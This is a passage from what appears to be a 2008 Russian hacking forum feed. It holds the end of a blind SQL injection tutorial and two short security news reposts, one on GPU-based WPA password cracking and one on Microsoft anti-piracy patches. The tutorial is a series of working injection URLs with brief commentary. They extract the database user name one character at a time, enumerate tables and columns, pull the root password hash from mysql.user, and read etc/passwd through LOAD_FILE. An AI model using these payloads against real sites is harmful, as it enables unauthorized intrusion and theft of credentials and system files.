4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))=108</pre></div></div></div><p>результат положительный то есть выдалось нам тоже самое что и при id=11<br />первый символ из имени юзера имеет номер в ascii 108 это буква &quot; l &quot; (L) так как используется lower если это скажется неблаготворно на посимвольном<br />подборе, нам придется обойтись без её использования, так как мы теряем заглавные буквы, но в данный момент нет.<br />второй символ узнается таким же способом</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),2,1)))&gt;1</pre></div></div></div><p>результат положительный<br />итд мы дошли до 97</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),2,1)))=97</pre></div></div></div><p>результат положительный значит наш символ в таблице ascii - 97 то есть буква a <br />далее<br />третий символ</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),3,1)))&gt;1</pre></div></div></div><p>результат положительный значит есть третий символ в имени<br />мы его таким же способом и подобрали</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),3,1)))=109</pre></div></div></div><p>результат положительный итак наш третий символ в ascii имеет номер 109 то есть m<br />четвертый символ</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),4,1)))&gt;1</pre></div></div></div><p>результат отрицательный, значит четвертого символа нету<br />и имя нашего юзера : lam</p> <p><span style="color: red">[Названия таблиц и столбцов]</span><br />Мне известны три способа<br />если пашет union но не выводит полей, то этим можно воспользоваться</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6--</pre></div></div></div><p>мы подобрали поля ошибки нет</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6+from+user--</pre></div></div></div><p>выода нет</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6+from+users--</pre></div></div></div><p>вывелся результ что и при id=10<br />значит таблица есть поля аналогично что и при обычной sql inj</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+union+select+1,2,user,4,5,6+from+users--</pre></div></div></div><p>результат отрицательный</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+union+select+1,2,username,4,5,6+from+users--</pre></div></div></div><p>результат положительный, значит username такой столбец есть в таблице.<br />тут ясно<br />второй способ</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+natural+left+join+user</pre></div></div></div><p>результат отрицательный значит таблицы user нет</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+natural+left+join+users</pre></div></div></div><p>ошибки нет, значит таблица существует<br />третий способ<br />прямо в слепой инъекции</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=1+AND+ascii(lower(substring((SELECT+1+from mysql.user+LIMIT+1),1,1)))&gt;1</pre></div></div></div><p>если таблица mysql.user существует, то нам выдаст результат 1 в ascii 31 и он &gt;1 поэтому результат будет положительный, если нет, то ничего не выдаст и результат отрицательный... Подберем столбцы предположим есть таблица mysql.user</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=1+AND+ascii(lower(substring((SELECT+user+from mysql.user+LIMIT+1),1,1)))&gt;1</pre></div></div></div><p>если нет столбца результат отрицательный, если таковой существует, то результат положительный... <br />Таким же способом можно узнать имя юзера и пароль, то есть так же как я описывал выше.<br />есть ещё такой вариант перебора, но он мне не нравится...</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring((SELECT+password from mysql.user+WHERE+user=&quot;root&quot;+LIMIT+1),1,1)))&gt;48</pre></div></div></div><p>просто мы указывам тут лишние значеения, которые могут быть нам не известны.<br />Функция LIMIT+1 отрезает нам первого юзера из таблицы, LIMIT+2 вырезает второго итд... Можно выдирать данные из information_schema а если ты панк то и</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=1+AND+ascii(lower(substring((SELECT+LOAD_FILE('etc/passwd')+from mysql.user+LIMIT+1),1,1)))&gt;1</pre></div></div></div><p>если месяц потрудитесь, то может и выдерите юзеров из etc</p> <p>&#160; <span style="color: silver">(c)ImpLex - Whack.ru</span></p> mybb@mybb.ru (AfeR) Mon, 20 Oct 2008 10:14:53 +0400 http://cah.hitbb.ru/viewtopic.php?pid=5#p5 http://cah.hitbb.ru/viewtopic.php?pid=4#p4 <p>Компания Elcomsoft подала заявку на патент с описанием новой технологии подбора паролей в беспроводных сетях, использующих стандарты безопасности WPA и WPA2. По заявлениям разработчиков, методика обеспечивает в десятки раз более высокую скорость подбора пароля по сравнению со стандартными средствами. </p> <p>Уже несколько лет ElcomSoft выпускает программное обеспечение Distributed Password Recovery, предназначенное для подбора забытых паролей. Недавно вниманию общественности была представлена новая версия инструмента, в котором за перебор вариантов отвечает многофункциональный графический процессор от NVIDIA, а не стандартный CPU. </p> <p>Проведенные испытания показали, что правильный ключ Wi-Fi подбирается в 10-15 раз быстрее при запуске решения от Elcomsoft на ноутбуке, укомплектованном видеокартой NVIDIA GeForce 8800M или 9800M. А использование того же самого ПО на настольном ПК, оснащенном двумя или несколькими картами NVIDIA GTX 280, повышает производительность приложения более чем в 100 раз. </p> <p>Elcomsoft Distributed Password Recovery также может использоваться для получения доступа к Windows-системам, разблокирования защищенных паролем документов Microsoft Office и PDF и решения других задач. Компания продвигает свой продукт на рынке как рабочий инструмент для сотрудников спецслужб и госучреждений, а также коммерческих фирм, предоставляющих услуги по восстановлению паролей и данных</p> <p>Между тем некоторые эксперты высказывают опасения, что инструментарий Elcomsoft Distributed Password Recovery может стать оружием в руках сетевых мошенников. Ведь теперь взлом защиты WPA/WPA2 в беспроводных сетях будет занимать не недели и месяцы, а дни и, возможно, даже часы.</p> <p><span style="color: silver">www.elcomsoft.ru</span></p> mybb@mybb.ru (AfeR) Sun, 19 Oct 2008 23:53:47 +0400 http://cah.hitbb.ru/viewtopic.php?pid=4#p4 http://cah.hitbb.ru/viewtopic.php?pid=3#p3 <p>Китайские информационные агентства, ссылаясь на внутреннюю корреспонденцию Microsoft, сообщают о новых планах корпорации по борьбе с пиратством в стране. </p> <p>По неофициальной информации, начиная с 20 октября софтверный гигант ужесточит свою политику в отношении китайских пользователей пиратских версий операционной системы Windows XP Professional и пакета офисных приложений MS Office. Предполагается, что китайское подразделение Microsoft выпустит два специальных патча, которые будут загружаться через систему автоматического обновления и выполнять несколько функций, в том числе агитационную. </p> <p>Помимо сообщений о преимуществах использования лицензионного софта, пользователей пиратских изданий Windows XP, не отключивших функцию автообновления, ожидает появление черного экрана при запуске системы. Для возврата нормального отображения рабочего стола придется изменить его фон. Однако экран будет чернеть каждый час. Кроме того, при входе в Windows пользователи увидят сообщение &quot;Возможно, вы стали жертвой компьютерного пиратства&quot;. </p> <p>Пользователи пиратских копий Microsoft Office столкнутся с проблемами в отображении панелей инструментов.</p> <p><span style="color: silver">security.compulenta.ru</span></p> mybb@mybb.ru (AfeR) Sun, 19 Oct 2008 23:51:48 +0400 http://cah.hitbb.ru/viewtopic.php?pid=3#p3